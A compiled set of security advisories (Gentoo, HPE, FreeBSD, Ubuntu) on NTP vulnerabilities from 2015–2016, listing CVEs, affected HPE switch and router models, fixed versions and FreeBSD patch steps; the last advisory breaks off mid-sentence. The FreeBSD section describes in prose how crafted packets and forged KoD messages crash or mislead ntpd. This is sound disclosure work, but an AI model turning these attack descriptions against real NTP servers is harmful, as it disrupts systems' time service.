http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851\n[ 12 ] CVE-2015-7852\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852\n[ 13 ] CVE-2015-7853\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853\n[ 14 ] CVE-2015-7854\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854\n[ 15 ] CVE-2015-7855\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855\n[ 16 ] CVE-2015-7871\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871\n[ 17 ] CVE-2015-7973\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973\n[ 18 ] CVE-2015-7974\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974\n[ 19 ] CVE-2015-7975\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975\n[ 20 ] CVE-2015-7976\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976\n[ 21 ] CVE-2015-7977\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977\n[ 22 ] CVE-2015-7978\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978\n[ 23 ] CVE-2015-7979\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979\n[ 24 ] CVE-2015-8138\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138\n[ 25 ] CVE-2015-8139\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139\n[ 26 ] CVE-2015-8140\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140\n[ 27 ] CVE-2015-8158\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158\n[ 28 ] CVE-2016-1547\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547\n[ 29 ] CVE-2016-1548\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548\n[ 30 ] CVE-2016-1549\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549\n[ 31 ] CVE-2016-1550\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550\n[ 32 ] CVE-2016-1551\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551\n[ 33 ] CVE-2016-2516\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516\n[ 34 ] CVE-2016-2517\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517\n[ 35 ] CVE-2016-2518\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518\n[ 36 ] CVE-2016-2519\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519\n[ 37 ] CVE-2016-4953\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953\n[ 38 ] CVE-2016-4954\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954\n[ 39 ] CVE-2016-4955\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955\n[ 40 ] CVE-2016-4956\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956\n[ 41 ] CVE-2016-4957\n       http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201607-15\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2016 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n\n\n. \n\nRelease Date: 2016-09-21\nLast Updated: 2016-09-21\n\nPotential Security Impact: Multiple Remote Vulnerabilities\n\nSource: Hewlett Packard Enterprise, Product Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities in NTP have been addressed with HPE\nComware 7 (CW7) network products. \n\nReferences:\n\n  - CVE-2015-7704\n  - CVE-2015-7705\n  - CVE-2015-7855\n  - CVE-2015-7871\n  - PSRT110228\n  - SSRT102943\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n  - Comware 7 (CW7) Products - Please refer to the RESOLUTION\n below for a list of impacted products. All product versions are impacted\nprior to the fixed versions listed. \n\nBACKGROUND\n\n  CVSS Base Metrics\n  =================\n  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector\n\n    CVE-2015-7704\n      6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n      6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)\n\n    CVE-2015-7705\n      6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n      6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)\n\n    CVE-2015-7855\n      6.5 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L\n      6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P)\n\n    CVE-2015-7871\n      5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n      5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)\n\n    Information on CVSS is documented in\n    HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\nRESOLUTION\nHPE has released the following software updates to resolve the\nvulnerabilities in HPE Comware 7 network products. \n\n**COMWARE 7 Products**\n\n  + **12500 (Comware 7) - Version: R7377**\n    * HP Network Products\n      - JC072B HP 12500 Main Processing Unit\n      - JC085A HP A12518 Switch Chassis\n      - JC086A HP A12508 Switch Chassis\n      - JC652A HP 12508 DC Switch Chassis\n      - JC653A HP 12518 DC Switch Chassis\n      - JC654A HP 12504 AC Switch Chassis\n      - JC655A HP 12504 DC Switch Chassis\n      - JF430A HP A12518 Switch Chassis\n      - JF430B HP 12518 Switch Chassis\n      - JF430C HP 12518 AC Switch Chassis\n      - JF431A HP A12508 Switch Chassis\n      - JF431B HP 12508 Switch Chassis\n      - JF431C HP 12508 AC Switch Chassis\n      - JG497A HP 12500 MPU w/Comware V7 OS\n      - JG782A HP FF 12508E AC Switch Chassis\n      - JG783A HP FF 12508E DC Switch Chassis\n      - JG784A HP FF 12518E AC Switch Chassis\n      - JG785A HP FF 12518E DC Switch Chassis\n      - JG802A HP FF 12500E MPU\n  + **10500 (Comware 7) - Version: R7178**\n    * HP Network Products\n      - JC611A HP 10508-V Switch Chassis\n      - JC612A HP 10508 Switch Chassis\n      - JC613A HP 10504 Switch Chassis\n      - JC748A HP 10512 Switch Chassis\n      - JG608A HP FlexFabric 11908-V Switch Chassis\n      - JG609A HP FlexFabric 11900 Main Processing Unit\n      - JG820A HP 10504 TAA Switch Chassis\n      - JG821A HP 10508 TAA Switch Chassis\n      - JG822A HP 10508-V TAA Switch Chassis\n      - JG823A HP 10512 TAA Switch Chassis\n      - JG496A HP 10500 Type A MPU w/Comware v7 OS\n      - JH198A HP 10500 Type D Main Processing Unit with Comware v7 Operating\nSystem\n      - JH206A HP 10500 Type D TAA-compliant with Comware v7 Operating System\nMain Processing Unit\n  + **12900 (Comware 7) - Version: R1138P03**\n    * HP Network Products\n      - JG619A HP FlexFabric 12910 Switch AC Chassis\n      - JG621A HP FlexFabric 12910 Main Processing Unit\n      - JG632A HP FlexFabric 12916 Switch AC Chassis\n      - JG634A HP FlexFabric 12916 Main Processing Unit\n      - JH104A HP FlexFabric 12900E Main Processing Unit\n      - JH114A HP FlexFabric 12910 TAA-compliant Main Processing Unit\n      - JH263A HP FlexFabric 12904E Main Processing Unit\n      - JH255A HP FlexFabric 12908E Switch Chassis\n      - JH262A HP FlexFabric 12904E Switch Chassis\n      - JH113A HP FlexFabric 12910 TAA-compliant Switch AC Chassis\n      - JH103A HP FlexFabric 12916E Switch Chassis\n  + **5900 (Comware 7) - Version: R2422P02**\n    * HP Network Products\n      - JC772A HP 5900AF-48XG-4QSFP+ Switch\n      - JG296A HP 5920AF-24XG Switch\n      - JG336A HP 5900AF-48XGT-4QSFP+ Switch\n      - JG510A HP 5900AF-48G-4XG-2QSFP+ Switch\n      - JG554A HP 5900AF-48XG-4QSFP+ TAA Switch\n      - JG555A HP 5920AF-24XG TAA Switch\n      - JG838A HP FF 5900CP-48XG-4QSFP+ Switch\n      - JH036A HP FlexFabric 5900CP 48XG 4QSFP+ TAA-Compliant\n      - JH037A HP 5900AF 48XGT 4QSFP+ TAA-Compliant Switch\n      - JH038A HP 5900AF 48G 4XG 2QSFP+ TAA-Compliant\n  + **MSR1000 (Comware 7) - Version: R0305P08**\n    * HP Network Products\n      - JG875A HP MSR1002-4 AC Router\n      - JH060A HP MSR1003-8S AC Router\n  + **MSR2000 (Comware 7) - Version: R0305P08**\n    * HP Network Products\n      - JG411A HP MSR2003 AC Router\n      - JG734A HP MSR2004-24 AC Router\n      - JG735A HP MSR2004-48 Router\n      - JG866A HP MSR2003 TAA-compliant AC Router\n  + **MSR3000 (Comware 7) - Version: R0305P08**\n    * HP Network Products\n      - JG404A HP MSR3064 Router\n      - JG405A HP MSR3044 Router\n      - JG406A HP MSR3024 AC Router\n      - JG407A HP MSR3024 DC Router\n      - JG408A HP MSR3024 PoE Router\n      - JG409A HP MSR3012 AC Router\n      - JG410A HP MSR3012 DC Router\n      - JG861A HP MSR3024 TAA-compliant AC Router\n  + **MSR4000 (Comware 7) - Version: R0305P08**\n    * HP Network Products\n      - JG402A HP MSR4080 Router Chassis\n      - JG403A HP MSR4060 Router Chassis\n      - JG412A HP MSR4000 MPU-100 Main Processing Unit\n      - JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit\n  + **VSR (Comware 7) - Version: E0322**\n    * HP Network Products\n      - JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation\nSoftware\n      - JG811AAE HP VSR1001 Comware 7 Virtual Services Router\n      - JG812AAE HP VSR1004 Comware 7 Virtual Services Router\n      - JG813AAE HP VSR1008 Comware 7 Virtual Services Router\n  + **7900 (Comware 7) - Version: R2138P03**\n    * HP Network Products\n      - JG682A HP FlexFabric 7904 Switch Chassis\n      - JG841A HP FlexFabric 7910 Switch Chassis\n      - JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit\n      - JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit\n      - JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis\n      - JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis\n      - JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main\nProcessing Unit\n      - JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main\nProcessing Unit\n  + **5130 (Comware 7) - Version: R3111P03**\n    * HP Network Products\n      - JG932A HP 5130-24G-4SFP+ EI Switch\n      - JG933A HP 5130-24G-SFP-4SFP+ EI Switch\n      - JG934A HP 5130-48G-4SFP+ EI Switch\n      - JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch\n      - JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch\n      - JG938A HP 5130-24G-2SFP+-2XGT EI Switch\n      - JG939A HP 5130-48G-2SFP+-2XGT EI Switch\n      - JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch\n      - JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch\n      - JG975A HP 5130-24G-4SFP+ EI Brazil Switch\n      - JG976A HP 5130-48G-4SFP+ EI Brazil Switch\n      - JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch\n      - JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch\n  + **5700 (Comware 7) - Version: R2422P02**\n    * HP Network Products\n      - JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch\n      - JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch\n      - JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch\n      - JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch\n      - JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch\n      - JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch\n  + **5930 (Comware 7) - Version: R2422P02**\n    * HP Network Products\n      - JG726A HP FlexFabric 5930 32QSFP+ Switch\n      - JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch\n      - JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch\n      - JH179A HP FlexFabric 5930 4-slot Switch\n      - JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch\n      - JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch\n  + **HSR6600 (Comware 7) - Version: R7103P07**\n    * HP Network Products\n      - JG353A HP HSR6602-G Router\n      - JG354A HP HSR6602-XG Router\n      - JG776A HP HSR6602-G TAA-compliant Router\n      - JG777A HP HSR6602-XG TAA-compliant Router\n  + **HSR6800 (Comware 7) - Version: R7103P07**\n    * HP Network Products\n      - JG361A HP HSR6802 Router Chassis\n      - JG361B HP HSR6802 Router Chassis\n      - JG362A HP HSR6804 Router Chassis\n      - JG362B HP HSR6804 Router Chassis\n      - JG363A HP HSR6808 Router Chassis\n      - JG363B HP HSR6808 Router Chassis\n      - JG364A HP HSR6800 RSE-X2 Router Main Processing Unit\n      - JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing\n      - JH075A HP HSR6800 RSE-X3 Router Main Processing Unit\n  + **1950 (Comware 7) - Version: R3111P03**\n    * HP Network Products\n      - JG960A HP 1950-24G-4XG Switch\n      - JG961A HP 1950-48G-2SFP+-2XGT Switch\n      - JG962A HP 1950-24G-2SFP+-2XGT-PoE+(370W) Switch\n      - JG963A HP 1950-48G-2SFP+-2XGT-PoE+(370W) Switch\n  + **7500 (Comware 7) - Version: R7178**\n    * HP Network Products\n      - JD238C HP 7510 Switch Chassis\n      - JD239C HP 7506 Switch Chassis\n      - JD240C HP 7503 Switch Chassis\n      - JD242C HP 7502 Switch Chassis\n      - JH207A HP 7500 1.2Tbps Fabric with 2-port 40GbE QSFP+ for IRF-Only\nMain Processing Unit\n      - JH208A HP 7502 Main Processing Unit\n      - JH209A HP 7500 2.4Tbps Fabric with 8-port 1/10GbE SFP+ and 2-port\n40GbE QSFP+ Main Processing Unit\n  + **5130HI - Version: R1118P02**\n    * HP Network Products\n      - JH323A HPE 5130 24G 4SFP+ 1-slot HI Switch\n      - JH324A HPE 5130 48G 4SFP+ 1-slot HI Switch\n      - JH325A HPE 5130 24G PoE+ 4SFP+ 1-slot HI Switch\n      - JH326A HPE 5130 48G PoE+ 4SFP+ 1-slot HI Switch\n  + **5510HI - Version: R1118P02**\n    * HP Network Products\n      - JH145A HPE 5510 24G 4SFP+ HI 1-slot Switch\n      - JH146A HPE 5510 48G 4SFP+ HI 1-slot Switch\n      - JH147A HPE 5510 24G PoE+ 4SFP+ HI 1-slot Switch\n      - JH148A HPE 5510 48G PoE+ 4SFP+ HI 1-slot Switch\n      - JH149A HPE 5510 24G SFP 4SFP+ HI 1-slot Switch\n\n**Note:** Please contact HPE Technical Support if any assistance is needed\nacquiring the software updates. \n\nHISTORY\nVersion:1 (rev.1) - 21 September 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n  Web form: https://www.hpe.com/info/report-security-vulnerability\n  Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=============================================================================\nFreeBSD-SA-15:25.ntp                                        Security Advisory\n                                                          The FreeBSD Project\n\nTopic:          Multiple vulnerabilities of ntp\n\nCategory:       contrib\nModule:         ntp\nAnnounced:      2015-10-26\nCredits:        Network Time Foundation\nAffects:        All supported versions of FreeBSD. \nCorrected:      2015-10-26 11:35:40 UTC (stable/10, 10.2-STABLE)\n                2015-10-26 11:36:55 UTC (releng/10.2, 10.2-RELEASE-p6)\n                2015-10-26 11:37:31 UTC (releng/10.1, 10.1-RELEASE-p23)\n                2015-10-26 11:36:40 UTC (stable/9, 9.3-STABLE)\n                2015-10-26 11:42:25 UTC (releng/9.3, 9.3-RELEASE-p29)\nCVE Name:       CVE-2015-7701, CVE-2015-7702, CVE-2015-7703, CVE-2015-7704,\n                CVE-2015-7848, CVE-2015-7849, CVE-2015-7850, CVE-2015-7851,\n                CVE-2015-7852, CVE-2015-7853, CVE-2015-7854, CVE-2015-7855,\n                CVE-2015-7871\n\nFor general information regarding FreeBSD Security Advisories,\nincluding descriptions of the fields above, security branches, and the\nfollowing sections, please visit https://security.FreeBSD.org/. \n\nI. \n\nII.  Problem Description\n\nCrypto-NAK packets can be used to cause ntpd(8) to accept time from an\nunauthenticated ephemeral symmetric peer by bypassing the authentication\nrequired to mobilize peer associations. [CVE-2015-7871] FreeBSD 9.3 and\n10.1 are not affected. \n\nIf ntpd(8) is fed a crafted mode 6 or mode 7 packet containing an unusual\nlong data value where a network address is expected, the decodenetnum()\nfunction will abort with an assertion failure instead of simply returning\na failure condition. [CVE-2015-7855]\n\nIf ntpd(8) is configured to allow remote configuration, and if the\n(possibly spoofed) source IP address is allowed to send remote\nconfiguration requests, and if the attacker knows the remote\nconfiguration password or if ntpd(8) was configured to disable\nauthentication, then an attacker can send a set of packets to ntpd(8) that\nmay cause it to crash, with the hypothetical possibility of a small code\ninjection. [CVE-2015-7854]\n\nA negative value for the datalen parameter will overflow a data buffer. \nNTF\u0027s ntpd(8) driver implementations always set this value to 0 and are\ntherefore not vulnerable to this weakness. If you are running a custom\nrefclock driver in ntpd(8) and that driver supplies a negative value for\ndatalen (no custom driver of even minimal competence would do this)\nthen ntpd would overflow a data buffer. It is even hypothetically\npossible in this case that instead of simply crashing ntpd the\nattacker could effect a code injection attack. [CVE-2015-7853]\n\nIf an attacker can figure out the precise moment that ntpq(8) is listening\nfor data and the port number it is listening on or if the attacker can\nprovide a malicious instance ntpd(8) that victims will connect to then an\nattacker can send a set of crafted mode 6 response packets that, if\nreceived by ntpq(8), can cause ntpq(8) to crash. [CVE-2015-7852]\n\nIf ntpd(8) is configured to allow remote configuration, and if the\n(possibly spoofed) IP address is allowed to send remote configuration\nrequests, and if the attacker knows the remote configuration password\nor if ntpd(8) was configured to disable authentication, then an attacker\ncan send a set of packets to ntpd that may cause ntpd(8) to overwrite\nfiles. [CVE-2015-7851].  The default configuration of ntpd(8) within\nFreeBSD does not allow remote configuration. \n\nIf ntpd(8) is configured to allow remote configuration, and if the\n(possibly spoofed) source IP address is allowed to send remote\nconfiguration requests, and if the attacker knows the remote\nconfiguration password or if ntpd(8) was configured to disable\nauthentication, then an attacker can send a set of packets to ntpd\nthat will cause it to crash and/or create a potentially huge log\nfile.  Specifically, the attacker could enable extended logging,\npoint the key file at the log file, and cause what amounts to an\ninfinite loop. [CVE-2015-7850].  The default configuration of ntpd(8)\nwithin FreeBSD does not allow remote configuration. \n\nIf ntpd(8) is configured to allow remote configuration, and if the\n(possibly spoofed) source IP address is allowed to send remote\nconfiguration requests, and if the attacker knows the remote\nconfiguration password or if ntpd was configured to disable\nauthentication, then an attacker can send a set of packets to\nntpd that may cause a crash or theoretically perform a code\ninjection attack. [CVE-2015-7849].  The default configuration of ntpd(8)\nwithin FreeBSD does not allow remote configuration. \n\nIf ntpd(8) is configured to enable mode 7 packets, and if the use\nof mode 7 packets is not properly protected thru the use of the\navailable mode 7 authentication and restriction mechanisms, and\nif the (possibly spoofed) source IP address is allowed to send\nmode 7 queries, then an attacker can send a crafted packet to\nntpd that will cause it to crash. [CVE-2015-7848].  The default\nconfiguration of ntpd(8) within FreeBSD does not allow mode 7\npackets. \n\nIf ntpd(8) is configured to use autokey, then an attacker can send\npackets to ntpd that will, after several days of ongoing attack,\ncause it to run out of memory. [CVE-2015-7701].  The default\nconfiguration of ntpd(8) within FreeBSD does not use autokey. \n\nIf ntpd(8) is configured to allow for remote configuration, and if\nthe (possibly spoofed) source IP address is allowed to send\nremote configuration requests, and if the attacker knows the\nremote configuration password, it\u0027s possible for an attacker\nto use the \"pidfile\" or \"driftfile\" directives to potentially\noverwrite other files. [CVE-2015-5196].  The default configuration\nof ntpd(8) within FreeBSD does not allow remote configuration\n\nAn ntpd(8) client that honors Kiss-of-Death responses will honor\nKoD messages that have been forged by an attacker, causing it\nto delay or stop querying its servers for time updates. Also,\nan attacker can forge packets that claim to be from the target\nand send them to servers often enough that a server that\nimplements KoD rate limiting will send the target machine a\nKoD response to attempt to reduce the rate of incoming packets,\nor it may also trigger a firewall block at the server for\npackets from the target machine. For either of these attacks\nto succeed, the attacker must know what servers the target\nis communicating with. An attacker can be anywhere on the\nInternet and can frequently learn the identity of the target\u0027s\ntime source by sending the target a time query. [CVE-2015-7704]\n\nThe fix for CVE-2014-9750 was incomplete in that there were\ncertain code paths where a packet with particular autokey\noperations that contained malicious data was not always being\ncompletely validated. Receipt of these packets can cause ntpd\nto crash. [CVE-2015-7702].  The default configuration of ntpd(8)\nwithin FreeBSD does not use autokey. \n\nIII. Impact\n\nAn attacker which can send NTP packets to ntpd(8), which uses cryptographic\nauthentication of NTP data, may be able to inject malicious time data\ncausing the system clock to be set incorrectly. [CVE-2015-7871]\n\nAn attacker which can send NTP packets to ntpd(8), can block the\ncommunication of the daemon with time servers, causing the system\nclock not being synchronized. [CVE-2015-7704]\n\nAn attacker which can send NTP packets to ntpd(8), can remotely crash\nthe daemon, sending malicious data packet. [CVE-2015-7855] [CVE-2015-7854]\n[CVE-2015-7853] [CVE-2015-7852] [CVE-2015-7849] [CVE-2015-7848]\n\nAn attacker which can send NTP packets to ntpd(8), can remotely\ntrigger the daemon to overwrite its configuration files. [CVE-2015-7851]\n[CVE-2015-5196]\n\nIV.  Workaround\n\nNo workaround is available, but systems not running ntpd(8) are not\naffected.  Network administrators are advised to implement BCP-38,\nwhich helps to reduce risk associated with the attacks. \n\nV.   Solution\n\nPerform one of the following:\n\n1) Upgrade your vulnerable system to a supported FreeBSD stable or\nrelease / security branch (releng) dated after the correction date. \n\nThe ntpd service has to be restarted after the update.  A reboot is\nrecommended but not required. \n\n2) To update your vulnerable system via a binary patch:\n\nSystems running a RELEASE version of FreeBSD on the i386 or amd64\nplatforms can be updated via the freebsd-update(8) utility:\n\n# freebsd-update fetch\n# freebsd-update install\n\nThe ntpd service has to be restarted after the update.  A reboot is\nrecommended but not required. \n\n3) To update your vulnerable system via a source code patch:\n\nThe following patches have been verified to apply to the applicable\nFreeBSD release branches. \n\na) Download the relevant patch from the location below, and verify the\ndetached PGP signature using your PGP utility. \n\n[FreeBSD 10.2]\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-102.patch.bz2\n# bunzip2 ntp-102.patch.bz2\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-102.patch.asc\n# gpg --verify ntp-102.patch.asc\n\n[FreeBSD 10.1]\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-101.patch.bz2\n# bunzip2 ntp-101.patch.bz2\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-101.patch.asc\n# gpg --verify ntp-101.patch.asc\n\n[FreeBSD 9.3]\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-93.patch.bz2\n# bunzip2 ntp-93.patch.bz2\n# fetch https://security.FreeBSD.org/patches/SA-15:25/ntp-93.patch.asc\n# gpg --verify ntp-93.patch.asc\n\nb) Apply the patch.  Execute the following commands as root:\n\n# cd /usr/src\n# patch \u003c /path/to/patch\n# find contrib/ntp -type f -empty -delete\n\nc) Recompile the operating system using buildworld and installworld as\ndescribed in https://www.FreeBSD.org/handbook/makeworld.html. \n\nd) For 9.3-RELEASE and 10.1-RELEASE an update to /etc/ntp.conf is recommended,\nwhich can be done with help of the mergemaster(8) tool on 9.3-RELEASE and\nwith help of the etcupdate(8) tool on 10.1-RELEASE. \n\nRestart the ntpd(8) daemon, or reboot the system. \n\nVI.  Correction details\n\nThe following list contains the correction revision numbers for each\naffected branch. \n\nBranch/path                                                      Revision\n- -------------------------------------------------------------------------\nstable/9/                                                         r289998\nreleng/9.3/                                                       r290001\nstable/10/                                                        r289997\nreleng/10.1/                                                      r290000\nreleng/10.2/                                                      r289999\n- -------------------------------------------------------------------------\n\nTo see which files were modified by a particular revision, run the\nfollowing command, replacing NNNNNN with the revision number, on a\nmachine with Subversion installed:\n\n# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base\n\nOr visit the following URL, replacing NNNNNN with the revision number:\n\nhttps://svnweb.freebsd.org/base?view=revision\u0026revision=NNNNNN\n\nVII. References\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7703\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871\n\nThe latest revision of this advisory is available at\nhttps://security.FreeBSD.org/advisories/FreeBSD-SA-15:25.ntp.asc\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIcBAEBAgAGBQJWLhOJAAoJEO1n7NZdz2rn91wP/2GwEt1boNQq2a7nYzv/mS5D\nsYKkIi7o+2yr2BLXvtc3O7c9QC3/YeGsza9DTRqndcY572SWvRgtkFstMTTm8IV/\nRVlIE40gVR3tex0zo7BiD7uKUrxWxWcpwMbE5dzlE+vSybyyj0dSSkwUHJjrbJoA\nRmyNuEEUhQn5sRCg6qJv/PLp2G7BcYAasKScukjm7QnLP2kq/tvM9mcqwfh2tadM\n7kbf8uq+ykvsRzctaDnxQaB5+zJxBQYJjBelxQfIkNek0XGfdj3sRwISeFznbllq\nmOLTIBaFiuEtHtusO7MKKavMgS5CQJOvuuvd/l3NY1MnxC6X/1SWig9KIKDIn/hv\nq8dsnq7LLx+tO6Cv4Dub7EbC2ZP3xXGOC4Ie02z8bTZnbX7iwyPUidQQqtU9ra15\nrxzFcZnBxu+yyMNJVsV2qVV/r9OycgKxWlEELC1wYrK9fKfvLdA5aEGjDeU1Z+s6\nJS2zKr0t4F2bMrCsjYP1lQD8sHkCVjwJk+IJU/slcwSajDjBNlMH0yBxGYE1ETIZ\nqMF7/PAkLe8V78pdYmXw9pcaPyhI+ihPLnNrdhX8AI2RX5jDK7IuUNJeUM04UrVB\n8N+mMwgamcuCPWNNyXaL0bz21fexZOuhHmU+B8Yn3SFX5O5b/r9gGvrjo8ei8jOk\nEUlBT3ViDhHNrI7PTaiI\n=djPm\n-----END PGP SIGNATURE-----\n. ============================================================================\nUbuntu Security Notice USN-2783-1\nOctober 27, 2015\n\nntp vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 15.10\n- Ubuntu 15.04\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. (CVE-2015-5146)\n\nMiroslav Lichvar discovered that NTP incorrectly handled logconfig\ndirectives. (CVE-2015-5194)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain statistics\ntypes. (CVE-2015-5195)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain 